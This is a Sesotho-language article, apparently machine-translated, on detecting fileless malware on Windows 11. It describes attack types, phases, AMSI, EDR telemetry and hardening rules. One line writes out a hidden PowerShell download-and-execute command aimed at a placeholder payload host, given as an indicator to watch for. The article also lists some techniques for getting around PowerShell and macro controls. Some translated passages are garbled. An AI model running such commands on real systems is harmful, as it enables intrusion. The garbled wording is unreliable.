Mokhoa oa ho bona malware a se nang faele ho Windows 11

¿Joang ho bona malware a kotsi a se nang faele? Ts'ebetso ea tlhaselo ea Fileless e eketsehile haholo, 'me ho mpefatsa litaba, Windows 11 ha e sireletseheMokhoa ona o feta disk mme o itšetlehile ka mohopolo le lisebelisoa tse nepahetseng tsa tsamaiso; ke ka lebaka leo mananeo a antivirus a thehiloeng ho signature a sokola. Haeba u batla tsela e tšepahalang ea ho e lemoha, karabo e ka ho kopanya telemetry, tlhahlobo ea boitšoaro, le li-control tsa Windows.

Sebakeng sa hona joale sa tikoloho, matšolo a sebelisang hampe PowerShell, WMI, kapa Mshta a sebelisana le mekhoa e tsoetseng pele joalo ka liente tsa memori, ho phehella "ntle le ho ama" disk, esita le. tlhekefetso ea firmwareNtho ea bohlokoa ke ho utloisisa 'mapa oa litšokelo, mekhahlelo ea tlhaselo, le hore na ba siea matšoao afe le ha tsohle li etsahala ka har'a RAM.

Malware e se nang faele ke eng mme ke hobaneng e amehile ho Windows 11?

Ha re bua ka litšokelo tse "se nang faele", re bua ka khoutu e mpe eo Ha ho hlokahale hore u behe li-executable tse ncha ho sistimi ea faele ho sebetsa. Hangata e kenngoa ts'ebetsong 'me e etsoa ka RAM, ho itšetlehile ka bafetoleli le li-binaries tse saennoeng ke Microsoft (mohlala, PowerShell, WMI, rundll32, mshtaSena se fokotsa maoto a hau mme se o lumella ho feta lienjineri tse batlang lifaele tse belaetsang feela.

Le litokomane tsa ofisi kapa li-PDF tse sebelisang bofokoli ho qala litaelo li nkuoa e le karolo ea ketsahalo ena, hobane kenya tshebetsong mohopolong ntle le ho siea li-binary tse molemo bakeng sa tlhahlobo. Tšebeliso e mpe ea macros le DDE Ofising, kaha khoutu e sebetsa ka lits'ebetso tse nepahetseng joalo ka WinWord.

Bahlaseli ba kopanya boenjiniere ba sechaba (phishing, lihokelo tsa spam) le maraba a tekheniki: ho tobetsa ha mosebelisi ho qala ketane eo ho eona script e jarollang le ho phethahatsa moputso oa ho qetela mohopolong, ho qoba ho siea letheba ka disk. Lipheo li tloha ho bosholu ba data ho isa ts'ebetsong ea ransomware, ho ea ho motsamao o khutsitseng oa lateral.

Mefuta ka mokhoa oa maoto tsamaisong: ho tloha ho 'hloekile' ho ea ho tse nyalisitsoeng

Ho qoba likhopolo tse ferekanyang, ho molemo ho arola litšokelo ka tekanyo ea tsona ea ho sebelisana le tsamaiso ea lifaele. Karohano ena ea hlakisa se phehellang, khoutu e lula hokae, 'me e siea matšoao afe?.

Mofuta oa I: ha ho mosebetsi oa faele

Malware e se nang faele ka botlalo ha e ngolle letho ho disk. Mohlala oa khale ke ho sebelisa hampe a tlokotsi ea marang-rang (joalo ka vector ea EternalBlue morao koana) ho kenya ts'ebetsong sebaka se ka morao se lulang mohopolong oa kernel (maemo a kang DoublePulsar). Mona, ntho e 'ngoe le e' ngoe e etsahala ka RAM 'me ha ho na lintho tsa khale tsamaisong ea faele.

Khetho e 'ngoe ke ho silafatsa firmware ea likarolo: BIOS/UEFI, li-adapter tsa marang-rang, li-peripherals tsa USB (mekhoa ea mofuta oa BadUSB) kapa esita le li-subsystem tsa CPU. Li phehella ka ho qala hape le ho kenya hape, ka bothata bo ekelitsoeng Lihlahisoa tse fokolang li hlahloba firmwareTsena ke litlhaselo tse rarahaneng, tse fokolang khafetsa, empa li kotsi ka lebaka la ho utsoa le ho tšoarella ha tsona.

Mofuta oa II: Ts'ebetso ea polokelo e sa tobang

Mona, malware ha e "tlohe" e ka sebelisoang, empa e sebelisa lijana tse laoloang ke sistimi tse bolokiloeng e le lifaele. Ka mohlala, backdoors hore semela litaelo tsa powershell sebakeng sa polokelo ea WMI ebe o qala ts'ebetso ea eona ka li-filters tsa liketsahalo. Hoa khoneha ho e kenya ho tloha molaong oa taelo ntle le ho lahla li-binary, empa polokelo ea WMI e lula holim'a disk e le database e nepahetseng, e leng ho etsang hore ho be thata ho hloekisa ntle le ho ama tsamaiso.

Ho latela pono e sebetsang, li nkuoa li se na lifaele, hobane setshelo seo (WMI, Registry, joalo-joalo) Ha se mokhoa oa khale o ka lemohuoang 'Me ho hloekisoa ha eona hase ntho e nyenyane. Sephetho: ho phehella ka bokhukhuni ho nang le mohlala o fokolang oa "setso".

Mofuta oa III: E hloka hore lifaele li sebetse

Linyeoe tse ling li boloka a 'fileless' phehello Boemong bo utloahalang, ba hloka mohloli o thehiloeng ho faele. Mohlala o tloaelehileng ke Kovter: e ngolisa leetsi la khetla bakeng sa katoloso e sa reroang; ha faele e nang le katoloso eo e buloa, lengolo le lenyenyane le sebelisang mshta.exe le qalisoa, le tsosolosa khoele e kotsi e tsoang ho Registry.

Leqheka ke hore lifaele tsena tsa "bait" tse nang le li-extensions tse sa reroang ha li na moputso o ka hlahlojoang, 'me bongata ba khoutu bo lula ho ngodiso (setshelo se seng). Ke ka lebaka leo li arotsoeng e le litšusumetso tse se nang lifaele, leha ho bua ka tieo li ipapisitse le "disk" e le 'ngoe kapa ho feta e le sesosa.

Likokoanyana le 'mabotho' a tšoaetso: moo e kenang teng le moo e ipatang teng

Ho ntlafatsa ho lemoha, ke habohlokoa ho etsa 'mapa oa sebaka seo tšoaetso e kenang ho sona le bongata ba tšoaetso. Pono ena e thusa ho rala ditaolo tse itseng Etelletsa pele telemetry e nepahetseng.

liketso

• E thehiloeng ho faele (Mofuta oa III): Litokomane, li-executable, lifaele tsa Flash/Java tsa lefa, kapa lifaele tsa LNK li ka sebelisa hampe sebapali kapa enjene e li sebelisang ho kenya shellcode mohopolong. Vector ea pele ke faele, empa moputso o ea ho RAM.
• Marang-rang (Mofuta oa I): Sephutheloana se sebelisang monyetla oa ho ba kotsing (mohlala, ho SMB) se fihlella ts'ebetso naheng ea basebelisi kapa kernel. WannaCry e tumme mokhoa ona. Mojaro oa memori o otlolohileng ntle le faele e ncha.

Hardware

• Lisebelisoa (Mofuta oa I): Disk kapa firmware ea karete ea marang-rang e ka fetoloa mme khoutu e hlahisoa. Ho thata ho hlahloba le ho phehella ka ntle ho OS.
• CPU le tsamaiso ea tsamaiso (Mofuta oa I): Theknoloji e kang ea Intel's ME/AMT e bontšitse litsela tsa ho Marang-rang le ts'ebetsong ntle le OSE hlasela ka tekanyo e tlase haholo, e nang le bokhoni bo phahameng ba ho utsoa.
• USB (Mofuta oa I): BadUSB e u lumella ho hlophisa bocha drive ea USB ho etsisa keyboard kapa NIC le ho qala litaelo kapa ho tsamaisa sephethephethe.
• BIOS / UEFI (Mofuta oa I): lonya firmware reprogramming (maemo a kang Mebromi) e tsamaeang pele ho Windows boots.
• Hypervisor (Mofuta oa I): Ho kenya ts'ebetsong mini-hypervisor ka tlas'a OS ho pata boteng ba eona. Ka seoelo, empa e se e hlokometsoe ka mokhoa oa hypervisor rootkits.

Phethahatso le ente

• E thehiloeng ho faele (Mofuta oa III): EXE / DLL / LNK kapa mesebetsi e hlophisitsoeng e hlahisang liente ka mekhoa e nepahetseng.
• makhro (Mofuta oa III): VBA e Ofising e ka tsebahatsa le ho etsa litefo, ho kenyeletsoa le ransomware e felletseng, ka tumello ea mosebelisi ka thetso.
• Scripts (Mofuta oa II): PowerShell, VBScript kapa JScript ho tsoa faeleng, mola oa taelo, ditshebeletso, Ngodiso kapa WMIMotho ea hlasetseng a ka thaepa mongolo sebakeng se hole ntle le ho ama disk.
• Rekoto ea ho qala (MBR/Boot) (Mofuta oa II): Malapa a kang Petya a hlakola lefapha la boot ho nka taolo qalong. E kantle ho sistimi ea faele, empa e fumaneha ho OS le litharollo tsa sejoale-joale tse ka e khutlisang.

Litlhaselo tse se nang lifaele li sebetsa joang: mekhahlelo le matšoao

Leha ba sa tlohele lifaele tse ka sebetsoang, matšolo a latela mohopolo o ikhethileng. Ho li utloisisa ho lumella ho beha leihlo. liketsahalo le likamano lipakeng tsa lits'ebetso tse sieang letšoao.

• Phihlello ea peleLitlhaselo tsa Phishing ka lihokelo kapa lihokelo, liwebsaete tse senyehileng, kapa lintlha tse utsoitsoeng. Liketane tse ngata li qala ka tokomane ea Office e hlahisang taelo PowerShell.
• Ho phehella: backdoors ka WMI (filters le lipeeletso), Linotlolo tsa ho etsa Registry kapa mesebetsi e reriloeng e hlahisang mangolo hape ntle le faele e ncha e kotsi.
• ExfiltrationHang ha tlhahisoleseding e bokelloa, e romelloa ka ntle ho marang-rang ho sebelisoa mekhoa e tšeptjoang (libatli, PowerShell, bitsadmin) ho kopanya sephethephethe.

Paterone ena e bolotsana haholo hobane e matšoao a tlhaselo Li ipata ka mokhoa o tloaelehileng: likhang tsa mola oa litaelo, ketane ea ts'ebetso, likhokahano tse sa tloaelehang, kapa phihlello ea li-API tsa ente.

Mekhoa e tloaelehileng: ho tloha mohopolong ho ea ho rekota

Batšoantšisi ba itšetlehile ka mefuta e mengata ea mekhoa hore optimize stealth. Hoa thusa ho tseba tse atileng haholo ho kenya tšebetsong phumano e sebetsang.

• Moahi mohopolong: E kenya litefo sebakeng sa ts'ebetso e tšepahalang e emetseng hore e kenngoe. li-rootkits le li-hook Ka kernel, ba phahamisa boemo ba ho pata.
• Ho phehella ho RegistryBoloka li-blobs tse patiloeng ka har'a linotlolo 'me u li khutlisetse metsi ho tsoa ho sebui se molaong (mshta, rundll32, wscript). Sesebelisoa sa ephemeral se ka itšeha ho fokotsa sebaka sa sona sa maoto.
• Lintlha tsa phishingA sebelisa li-username le li-password tse utsoitsoeng, mohlaseli o etsa likhetla le limela tse hole phihlello e kgutsitseng ho Registry kapa WMI.
• 'Fileless' RansomwareEncryption le puisano ea C2 li hlophisitsoe ho tloha RAM, ho fokotsa menyetla ea ho lemoha ho fihlela tšenyo e bonahala.
• Lisebelisoa tsa ho sebetsa: liketane tse iketselitsoeng tse lemohang bofokoli le ho tsamaisa meputso ea mohopolo feela ka mor'a hore mosebelisi a tobetse.
• Litokomane tse nang le khoutu: macros le mekhoa e kang DDE e hlahisang litaelo ntle le ho boloka li-executable ho disk.

Lithuto tsa indasteri li se li bontšitse litlhōrō tse hlokomelehang: ka nako e le 'ngoe ea 2018, a ho eketseha ho feta 90% ho script-based le litlhaselo tsa ketane ea PowerShell, sesupo sa hore vector e ratoa bakeng sa katleho ea eona.

Bothata bakeng sa lik'hamphani le bafani ba thepa: ke hobane'ng ha ho thibela ho sa lekana

E ka ba teko ea ho tima PowerShell kapa ho thibela macros ka ho sa feleng, empa O ne o tla roba opereishenePowerShell ke tšiea ea tsamaiso ea sejoale-joale mme Ofisi e bohlokoa khoebong; ho thibela ka bofofu hangata ha ho khonehe.

Ho feta moo, ho na le mekhoa ea ho tlola taolo ea mantlha: ho tsamaisa PowerShell ka DLL le rundll32, litokomane tsa ho paka ho EXEs, Tla le kopi ea hau ea PowerShell kapa u pate mangolo litšoantšong ebe u li ntša mohopolong. Ka hona, tšireletso e ke ke ea itšetleha feela ka ho hana ho ba teng ha lisebelisoa.

Phoso e 'ngoe e tloaelehileng ke ho fana ka qeto eohle ho leru: haeba moemeli a tlameha ho emela karabo ho tsoa ho seva, U lahleheloa ke thibelo ea nako ea sebeleLintlha tsa Telemetry li ka romelloa ho ntlafatsa tlhahisoleseling, empa the Phokotso e tlameha ho etsahala qetellong.

Mokhoa oa ho bona malware a se nang faele ho Windows 11: telemetry le boitšoaro

Leano la ho hlola ke hlokomela lits'ebetso le mohopoloEseng lifaele. Boitšoaro bo lonya bo tsitsitse ho feta mefuta eo faele e e nkang, e etsa hore e be tse loketseng lienjineri tsa thibelo.

• AMSI (Antimalware Scan Interface)E thibela mangolo a PowerShell, VBScript, kapa JScript leha a hahiloe ka matla mohopolong. E ntle bakeng sa ho ts'oara likhoele tse ofuscated pele ho ho bolaoa.
• Tlhokomelo ea ts'ebetso: qala / qeta, PID, batsoali le bana, litsela, mela ea taelo le li-hashes, hammoho le lifate tsa polao ho utloisisa pale e felletseng.
• Tlhahlobo ea memori: ho fumanoa ha liente, meroalo e bonahatsang kapa ea PE ntle le ho ama disk, le ho hlahloba libaka tse sa tloaelehang tse sebetsang.
• Tšireletso ea lekala la ho qala: ho laola le ho tsosolosoa ha MBR/EFI ha ho ka etsoa hampe.

Ho Microsoft ecosystem, Defender for Endpoint e kopanya AMSI, tlhokomelo ea boitšoaroHo hlahloba memori le ho ithuta ka mochini o thehiloeng marung ho sebelisoa ho lekola phumano khahlano le mefuta e mecha kapa e sa bonahaleng. Barekisi ba bang ba sebelisa mekhoa e ts'oanang le lienjine tse lulang kernel.

Mohlala oa sebele oa khokahano: ho tloha tokomane ho ea ho PowerShell

Ak'u nahane ka ketane moo Outlook e khoasollang sephutheloana, Lentsoe le bula tokomane, litaba tse sebetsang li lumelletsoe, 'me PowerShell e qalisoa ka li-parameter tse belaetsang. Telemetry e nepahetseng e ne e tla bontša Mola oa taelo (mohlala, ExecutionPolicy Bypass, fensetere e patiloeng), e hokahanyang le sebaka se sa tšepahaleng le ho theha mokhoa oa ngoana o instolang ho AppData.

Moemeli ea nang le moelelo oa sebaka o khona ho ema le ho kgutla ts'ebetso e mpe ntle le ho kenella ka letsoho, ntle le ho tsebisa SIEM kapa ka lengolo-tsoibila/SMS. Lihlahisoa tse ling li eketsa motso oa sesosa (mefuta ea mofuta oa StoryLine), e sa supeng ts'ebetso e bonahalang (Outlook/Word), empa ho khoele e tletseng lonya le tšimoloho ea eona ea ho hloekisa tsamaiso ka botlalo.

Mokhoa o tloaelehileng oa taelo oo u lokelang ho o ela hloko o ka shebahala tjena: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic ha se khoele e nepahetseng, empa sete ya matshwao: pholisi ea ho pota-pota, fensetere e patiloeng, download e hlakileng, le ts'ebetso ea mohopolo.

AMSI, lipeipi le karolo ea sebapali ka seng: ho tloha pheletsong ho ea ho SOC

Ntle le ho ts'oaroa ha mongolo, boqapi bo matla bo hlophisa mehato e thusang lipatlisiso le karabelo. Bopaki bo bongata pele o phethahatsa mojaro, bo molemo., molemo ka ho fetisisa.

• Khatiso ea scriptAMSI e fana ka litaba (leha li hlahisoa hang-hang) bakeng sa tlhahlobo e tsitsitseng le e matla ho phaephe ea malware.
• Ts'ebetso ea liketsahaloLi-PID, li-binaries, hashes, litsela, le lintlha tse ling lia bokelloa. khang, ho theha lifate tsa ts'ebetso tse ileng tsa lebisa mojaro oa ho qetela.
• Ho fumanoa le ho tlalehaLintho tse sibolotsoeng li bonts'oa khomphutha ea sehlahisoa ebe li fetisetsoa ho li-platform tsa marang-rang (NDR) bakeng sa pono ea phutuho.
• Litiisetso tsa basebelisiLeha script e kentsoe mohopolong, moralo AMSI ea e thibela liphetolelong tse lumellanang tsa Windows.
• Bokhoni ba tsamaiso: tlhophiso ea leano ho nolofalletsa tlhahlobo ea script, thibelo e thehiloeng boitšoarong le ho theha litlaleho ho tsoa ho console.
• Mosebetsi oa SOC: ho ntšoa ha lintho tsa khale (VM UUID, mofuta oa OS, mofuta oa script, mokhoa oa ho qala le motsoali oa eona, li-hashes le mela ea litaelo) ho tsosolosa histori le phahamisa melao bokamoso.

Ha sethala se lumella ho romela kantle ho naha ea polokelo ea memori Ho tsamaellana le ts'ebetso, bafuputsi ba ka hlahisa lintlha tse ncha le ho ntlafatsa ts'ireletso khahlanong le mefuta e tšoanang.

Mehato e sebetsang ho Windows 11: thibelo le ho tsoma

Ntle le ho ba le EDR ka tlhahlobo ea memori le AMSI, Windows 11 e u lumella ho koala libaka tsa tlhaselo le ho ntlafatsa ponahalo ka ditaolo tsa matsoalloa.

• Ngoliso le lithibelo ho PowerShellE nolofalletsa Script Block Logging le Module Logging, e sebelisa mekhoa e thibetsoeng moo ho khonehang, 'me e laola tšebeliso ea E patiloe/ E patiloe.
• Melao ea Phokotso ea Sebaka sa Tlhaselo (ASR).: thibela script ho qala ka mekhoa ea Office le Tšebeliso e mpe ea WMI/PSExec ha ho hlokahala.
• Melao e kholo ea ofisi: e thibela ka ho sa feleng, ho saena ka hare ho macro le manane a tiileng a trust; e hlokomela phallo ea DDE ea lefa.
• WMI Audit le Registry: e beha leihlo lipeeletso tsa ketsahalo le linotlolo tsa ho etsa othomathike (Run, RunOnce, Winlogon), hammoho le tlhahiso ea mesebetsi hlophisitsoe.
• Tšireletso ea ho qala: e kenya tshebetsong Secure Boot, e hlahloba botšepehi ba MBR/EFI mme e netefatsa hore ha ho na liphetoho qalong.
• Ho patisa le ho thatafatsa: e koala likotsi tse ka sebelisoang ho libatli, likarolo tsa Office, le lits'ebeletso tsa marang-rang.
• Tlhokomeliso: e koetlisa basebelisi le lihlopha tsa botekgeniki ho phishing le matšoao a lipolao tse ipatileng.

Bakeng sa ho tsoma, tsepamisa maikutlo ho lipotso tse mabapi le: ho theha lits'ebetso ka Ofisi ho PowerShell/MSHTA, likhang le downloadstring/downloadfileLingoliloeng tse nang le obfuscation e hlakileng, liente tse bonahatsang maikutlo, le marang-rang a tsoang ho li-TLD tse belaetsang. Kopanya matšoao ana ka botumo le khafetsa ho fokotsa lerata.

Enjene ka 'ngoe e ka lemoha eng kajeno?

Litharollo tsa khoebo tsa Microsoft li kopanya AMSI, analytics ea boitšoaro, hlahloba mohopolo le tshireletso ya lekala la boot, mmoho le mefuta ya ML e thehilweng hodima maru ho hola kgahlanong le ditshoso tse hlahang. Barekisi ba bang ba kenya ts'ebetso ea tlhahlobo ea boemo ba kernel ho khetholla kotsi e mpe ho software e mpe e nang le phetoho ea othomathike ea liphetoho.

Mokhoa o thehiloeng ho lipale tsa ho phethahatsa E o lumella ho tseba sesosa sa motso (mohlala, sehokelo sa Outlook se bakang ketane) le ho fokotsa sefate kaofela: lingoloa, linotlolo, mesebetsi le li-binary tsa mahareng, ho qoba ho ts'oara matšoao a bonahalang.

Liphoso tse tloaelehileng le mokhoa oa ho li qoba

Ho thibela PowerShell ntle le moralo o mong oa taolo ha ho na thuso feela, empa ho boetse ho na le mekhoa ea ho e bitsa ka mokhoa o sa tobangHoa tšoana le ho li-macros: ebang u li laola ka maano le li-signature, kapa khoebo e tla utloa bohloko. Ho molemo ho tsepamisa maikutlo ho telemetry le melao ea boitšoaro.

Phoso e 'ngoe e tloaelehileng ke ho lumela hore likopo tsa whitelisting li rarolla ntho e' ngoe le e 'ngoe: theknoloji e se nang faele e itšetlehile ka sena hantle. lisebelisoa tse tšeptjoangTaolo e lokela ho ela hloko seo ba se etsang le hore na ba amana joang, eseng feela hore na ba lumelloa.

Ka tsohle tse ka holimo, malware a se nang faele ha e sa le "sepoko" ha u beha leihlo se hlileng se leng bohlokoa: boitšoaro, mohopolo, le tšimoloho ya phethahatso ka nngwe. Ho kopanya AMSI, telemetry ea ts'ebetso e ruileng, letsoalloa Windows 11 taolo, le lera la EDR le tlhahlobo ea boitšoaro ho u fa monyetla. Eketsa ho maano a nnete a equation bakeng sa macros le PowerShell, tlhahlobo ea WMI / Registry, le ho tsoma ho etelletsang pele mela ea litaelo le ho sebetsa lifate, 'me u na le ts'ireletso e khaolang liketane tsena pele li etsa molumo.